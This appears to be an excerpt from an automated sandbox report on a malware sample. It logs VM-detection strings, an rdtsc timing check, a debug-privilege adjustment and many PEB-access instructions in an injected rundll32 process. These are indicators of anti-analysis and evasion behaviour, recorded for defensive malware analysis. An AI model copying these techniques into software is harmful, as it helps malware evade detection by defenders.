        Source: explorer.exe, 00000003.00000003.562894525.0000000008577000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000003.00000000.540271211.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
        Source: explorer.exe, 00000003.00000003.672855160.000000000D001000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.672404068.000000000CFD9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04446DE6 rdtsc 8_2_04446DE6
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A44B mov eax, dword ptr fs:[00000030h]8_2_0443A44B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449C450 mov eax, dword ptr fs:[00000030h]8_2_0449C450
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449C450 mov eax, dword ptr fs:[00000030h]8_2_0449C450
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442746D mov eax, dword ptr fs:[00000030h]8_2_0442746D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D740D mov eax, dword ptr fs:[00000030h]8_2_044D740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D740D mov eax, dword ptr fs:[00000030h]8_2_044D740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D740D mov eax, dword ptr fs:[00000030h]8_2_044D740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486C0A mov eax, dword ptr fs:[00000030h]8_2_04486C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486C0A mov eax, dword ptr fs:[00000030h]8_2_04486C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486C0A mov eax, dword ptr fs:[00000030h]8_2_04486C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486C0A mov eax, dword ptr fs:[00000030h]8_2_04486C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443BC2C mov eax, dword ptr fs:[00000030h]8_2_0443BC2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8CD6 mov eax, dword ptr fs:[00000030h]8_2_044D8CD6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C14FB mov eax, dword ptr fs:[00000030h]8_2_044C14FB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486CF0 mov eax, dword ptr fs:[00000030h]8_2_04486CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486CF0 mov eax, dword ptr fs:[00000030h]8_2_04486CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486CF0 mov eax, dword ptr fs:[00000030h]8_2_04486CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441849B mov eax, dword ptr fs:[00000030h]8_2_0441849B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04443D43 mov eax, dword ptr fs:[00000030h]8_2_04443D43
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04483540 mov eax, dword ptr fs:[00000030h]8_2_04483540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04427D50 mov eax, dword ptr fs:[00000030h]8_2_04427D50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442C577 mov eax, dword ptr fs:[00000030h]8_2_0442C577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442C577 mov eax, dword ptr fs:[00000030h]8_2_0442C577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440AD30 mov eax, dword ptr fs:[00000030h]8_2_0440AD30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CE539 mov eax, dword ptr fs:[00000030h]8_2_044CE539
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434D3B mov eax, dword ptr fs:[00000030h]8_2_04434D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434D3B mov eax, dword ptr fs:[00000030h]8_2_04434D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434D3B mov eax, dword ptr fs:[00000030h]8_2_04434D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8D34 mov eax, dword ptr fs:[00000030h]8_2_044D8D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0448A537 mov eax, dword ptr fs:[00000030h]8_2_0448A537
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov ecx, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441D5E0 mov eax, dword ptr fs:[00000030h]8_2_0441D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441D5E0 mov eax, dword ptr fs:[00000030h]8_2_0441D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CFDE2 mov eax, dword ptr fs:[00000030h]8_2_044CFDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CFDE2 mov eax, dword ptr fs:[00000030h]8_2_044CFDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CFDE2 mov eax, dword ptr fs:[00000030h]8_2_044CFDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CFDE2 mov eax, dword ptr fs:[00000030h]8_2_044CFDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044B8DF1 mov eax, dword ptr fs:[00000030h]8_2_044B8DF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432581 mov eax, dword ptr fs:[00000030h]8_2_04432581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432581 mov eax, dword ptr fs:[00000030h]8_2_04432581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432581 mov eax, dword ptr fs:[00000030h]8_2_04432581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432581 mov eax, dword ptr fs:[00000030h]8_2_04432581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443FD9B mov eax, dword ptr fs:[00000030h]8_2_0443FD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443FD9B mov eax, dword ptr fs:[00000030h]8_2_0443FD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D05AC mov eax, dword ptr fs:[00000030h]8_2_044D05AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D05AC mov eax, dword ptr fs:[00000030h]8_2_044D05AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044335A1 mov eax, dword ptr fs:[00000030h]8_2_044335A1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04431DB5 mov eax, dword ptr fs:[00000030h]8_2_04431DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04431DB5 mov eax, dword ptr fs:[00000030h]8_2_04431DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04431DB5 mov eax, dword ptr fs:[00000030h]8_2_04431DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CAE44 mov eax, dword ptr fs:[00000030h]8_2_044CAE44
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CAE44 mov eax, dword ptr fs:[00000030h]8_2_044CAE44
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441766D mov eax, dword ptr fs:[00000030h]8_2_0441766D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440C600 mov eax, dword ptr fs:[00000030h]8_2_0440C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440C600 mov eax, dword ptr fs:[00000030h]8_2_0440C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440C600 mov eax, dword ptr fs:[00000030h]8_2_0440C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04438E00 mov eax, dword ptr fs:[00000030h]8_2_04438E00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1608 mov eax, dword ptr fs:[00000030h]8_2_044C1608
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A61C mov eax, dword ptr fs:[00000030h]8_2_0443A61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A61C mov eax, dword ptr fs:[00000030h]8_2_0443A61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440E620 mov eax, dword ptr fs:[00000030h]8_2_0440E620
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BFE3F mov eax, dword ptr fs:[00000030h]8_2_044BFE3F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04448EC7 mov eax, dword ptr fs:[00000030h]8_2_04448EC7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BFEC0 mov eax, dword ptr fs:[00000030h]8_2_044BFEC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044336CC mov eax, dword ptr fs:[00000030h]8_2_044336CC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8ED6 mov eax, dword ptr fs:[00000030h]8_2_044D8ED6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044316E0 mov ecx, dword ptr fs:[00000030h]8_2_044316E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044176E2 mov eax, dword ptr fs:[00000030h]8_2_044176E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449FE87 mov eax, dword ptr fs:[00000030h]8_2_0449FE87
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D0EA5 mov eax, dword ptr fs:[00000030h]8_2_044D0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D0EA5 mov eax, dword ptr fs:[00000030h]8_2_044D0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D0EA5 mov eax, dword ptr fs:[00000030h]8_2_044D0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044846A7 mov eax, dword ptr fs:[00000030h]8_2_044846A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441EF40 mov eax, dword ptr fs:[00000030h]8_2_0441EF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441FF60 mov eax, dword ptr fs:[00000030h]8_2_0441FF60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8F6A mov eax, dword ptr fs:[00000030h]8_2_044D8F6A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D070D mov eax, dword ptr fs:[00000030h]8_2_044D070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D070D mov eax, dword ptr fs:[00000030h]8_2_044D070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A70E mov eax, dword ptr fs:[00000030h]8_2_0443A70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A70E mov eax, dword ptr fs:[00000030h]8_2_0443A70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442F716 mov eax, dword ptr fs:[00000030h]8_2_0442F716
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449FF10 mov eax, dword ptr fs:[00000030h]8_2_0449FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449FF10 mov eax, dword ptr fs:[00000030h]8_2_0449FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04404F2E mov eax, dword ptr fs:[00000030h]8_2_04404F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04404F2E mov eax, dword ptr fs:[00000030h]8_2_04404F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443E730 mov eax, dword ptr fs:[00000030h]8_2_0443E730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044437F5 mov eax, dword ptr fs:[00000030h]8_2_044437F5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04418794 mov eax, dword ptr fs:[00000030h]8_2_04418794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487794 mov eax, dword ptr fs:[00000030h]8_2_04487794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487794 mov eax, dword ptr fs:[00000030h]8_2_04487794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487794 mov eax, dword ptr fs:[00000030h]8_2_04487794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04420050 mov eax, dword ptr fs:[00000030h]8_2_04420050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04420050 mov eax, dword ptr fs:[00000030h]8_2_04420050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D1074 mov eax, dword ptr fs:[00000030h]8_2_044D1074
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C2073 mov eax, dword ptr fs:[00000030h]8_2_044C2073
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D4015 mov eax, dword ptr fs:[00000030h]8_2_044D4015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D4015 mov eax, dword ptr fs:[00000030h]8_2_044D4015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487016 mov eax, dword ptr fs:[00000030h]8_2_04487016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487016 mov eax, dword ptr fs:[00000030h]8_2_04487016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487016 mov eax, dword ptr fs:[00000030h]8_2_04487016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441B02A mov eax, dword ptr fs:[00000030h]8_2_0441B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441B02A mov eax, dword ptr fs:[00000030h]8_2_0441B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441B02A mov eax, dword ptr fs:[00000030h]8_2_0441B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441B02A mov eax, dword ptr fs:[00000030h]8_2_0441B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov ecx, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044040E1 mov eax, dword ptr fs:[00000030h]8_2_044040E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044040E1 mov eax, dword ptr fs:[00000030h]8_2_044040E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044040E1 mov eax, dword ptr fs:[00000030h]8_2_044040E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044058EC mov eax, dword ptr fs:[00000030h]8_2_044058EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409080 mov eax, dword ptr fs:[00000030h]8_2_04409080
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04483884 mov eax, dword ptr fs:[00000030h]8_2_04483884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04483884 mov eax, dword ptr fs:[00000030h]8_2_04483884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044490AF mov eax, dword ptr fs:[00000030h]8_2_044490AF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443F0BF mov ecx, dword ptr fs:[00000030h]8_2_0443F0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443F0BF mov eax, dword ptr fs:[00000030h]8_2_0443F0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443F0BF mov eax, dword ptr fs:[00000030h]8_2_0443F0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442B944 mov eax, dword ptr fs:[00000030h]8_2_0442B944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442B944 mov eax, dword ptr fs:[00000030h]8_2_0442B944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440C962 mov eax, dword ptr fs:[00000030h]8_2_0440C962
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B171 mov eax, dword ptr fs:[00000030h]8_2_0440B171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B171 mov eax, dword ptr fs:[00000030h]8_2_0440B171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409100 mov eax, dword ptr fs:[00000030h]8_2_04409100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409100 mov eax, dword ptr fs:[00000030h]8_2_04409100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409100 mov eax, dword ptr fs:[00000030h]8_2_04409100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov eax, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov eax, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov eax, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov eax, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov ecx, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443513A mov eax, dword ptr fs:[00000030h]8_2_0443513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443513A mov eax, dword ptr fs:[00000030h]8_2_0443513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044941E8 mov eax, dword ptr fs:[00000030h]8_2_044941E8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B1E1 mov eax, dword ptr fs:[00000030h]8_2_0440B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B1E1 mov eax, dword ptr fs:[00000030h]8_2_0440B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B1E1 mov eax, dword ptr fs:[00000030h]8_2_0440B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442C182 mov eax, dword ptr fs:[00000030h]8_2_0442C182
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A185 mov eax, dword ptr fs:[00000030h]8_2_0443A185
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432990 mov eax, dword ptr fs:[00000030h]8_2_04432990
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044361A0 mov eax, dword ptr fs:[00000030h]8_2_044361A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044361A0 mov eax, dword ptr fs:[00000030h]8_2_044361A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044869A6 mov eax, dword ptr fs:[00000030h]8_2_044869A6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044851BE mov eax, dword ptr fs:[00000030h]8_2_044851BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044851BE mov eax, dword ptr fs:[00000030h]8_2_044851BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044851BE mov eax, dword ptr fs:[00000030h]8_2_044851BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044851BE mov eax, dword ptr fs:[00000030h]8_2_044851BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409240 mov eax, dword ptr fs:[00000030h]8_2_04409240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409240 mov eax, dword ptr fs:[00000030h]8_2_04409240
